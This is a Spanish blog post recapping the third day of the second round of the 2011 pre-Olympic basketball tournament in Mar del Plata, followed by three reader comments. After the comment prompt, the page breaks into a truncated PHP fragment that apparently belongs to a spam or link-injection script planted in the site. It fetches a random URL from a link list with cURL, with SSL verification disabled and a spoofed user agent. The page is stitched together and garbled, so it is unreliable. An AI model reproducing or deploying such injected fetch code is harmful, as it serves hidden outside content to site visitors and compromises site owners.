Preolímpico de Mar del Plata: 3ª Jornada de la 2ª Fase

08 de September de 2011 por German

Jornada con partidos emocionantes. Con las cosas ya definidas los equipos descargaron tensiones y se dieron encuentros más vibrantes.

Argentina 71 – 73 Brasil: El torneo se quedó sin invictos y Argentina probablemente sin Nocioni. El jugador de los Sixers cayó mal… ¡al realizar el salto inicial! No volvió a ver acción y se está estudiando la gravedad de su lesión. Muy buena defensa del conjunto brasileño durante todo el partido, gracias a ella sacaron ventaja en la segunda mitad que fueron manteniendo hasta el final. Los locales pusieron muchos minutos en cancha a sus titulares pero no alcanzó. Scola dominó los tableros hasta que tuvo que retirarse por faltas a dos minutos del cierre. Todo queda abierto a lo que ocurra mañana.

Destacados:
Luis Scola (24 Pts, 11 Reb, 3 As, 2 Rob)
Rafael Hettsheimer (19 Pts, 8 Reb, 2 Rob, 1 Tap)

Canadá 70 – 68 Uruguay: La celeste se quedo a las puertas del milagro, remontó 21 puntos y tuvo el triunfo en un intento de tres puntos en las manos de García pero no pudo ser. Los canadienses no contaron con el center de Miami Heat, Joel Anthony, pero estuvieron inspirados con los triples y con una sólida defensa lograron que su rival anotase tan solo un 32% de tiros de campo. Con esta victoria, para acceder a la repesca necesitan vencer a Panamá y esperar que Venezuela caiga ante los uruguayos.

Destacados:
Levon Kendall (19 Pts, 11 Reb, 3 Tap, 2 As)
Martin Osimani (17 Pts, 5 Reb, 3 As, 3 Rob)

Venezuela 110 – 74 Panamá: Tercer día seguido que el conjunto panameño es pisoteado. En cuanto se vio un poco lejos en el marcador se entregó definitivamente. Para colmo, uno de sus pocos jugadores interesantes, Danilo Pinnock, se retiró lesionado. La vinotinto arrasó con su marca registrada: ofensivas rápidas y correr por toda la pista. Tuvo a un Greivis Vázquez en gran forma y al resto del equipo colaborando como siempre. Dependen de sí mismos para acceder a la repesca. Sin duda se lo merecen.

Destacados:
Greivis Vazquez (24 Pts, 8 As, 3 Reb)
Josimar Ayarza (30 Pts, 6 Reb)

República Dominicana 62 – 74 Puerto Rico: Esperábamos más de este encuentro, pero una sólida actuación de los portorriqueños, especialmente en defensa, encabezada por JJ Barea les dio una cómoda victoria. No sintieron para nada la baja de Santiago. Los dominicanos lanzaron muy mal (incluso desde la línea de tiros libres: 60%) y rotaron mucho a sus jugadores buscando llegar de la mejor manera al duelo crucial del sábado.

Destacados:
Al Horford (16 Pts, 9 Reb)
Jose Juan Barea (14 Pts, 7 As, 4 Reb)

Comenta

3 comentarios a esta entrada

  1. The wolf dice:
    #1

    Primero antes de todo darte las gracias por este tipo de cronica que tambien interesan y al menos a mi me has descubierto un torneo que no ubicaba yo por estas fechas xD
    Ahora bien…por culpa de mi incultura baloncestistica me ha surgido una duda algo existencial…en este torneo he visto que hay selecciones de norteamerica y centroamerica como Canada o Puertorico….entonces USA no juega esto porque ya tiene pase directo al haber ganado el de Pekin o porque son mas guapos que nadie??

      Citar

  2. Txusma dice:
    #2

    USA ya está clasificada gracias a que es la actual campeona del mundo.
    La verdad es que no acabo de entender pq coinciden el Europeo y el Preolímpico de las Arenas en el tiempo. Será que no ha habido tiempo durante todo el verano para que las 2 competiciones no se solapen.
    Y por otro lado: Os gusta esto del Europeo cada 2 años?

      Citar

  3. TheDeerHunter dice:
    #3

    a mí no mucho, la verdad… pero lo prefiero a un pre-olímpico, por ejemplo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>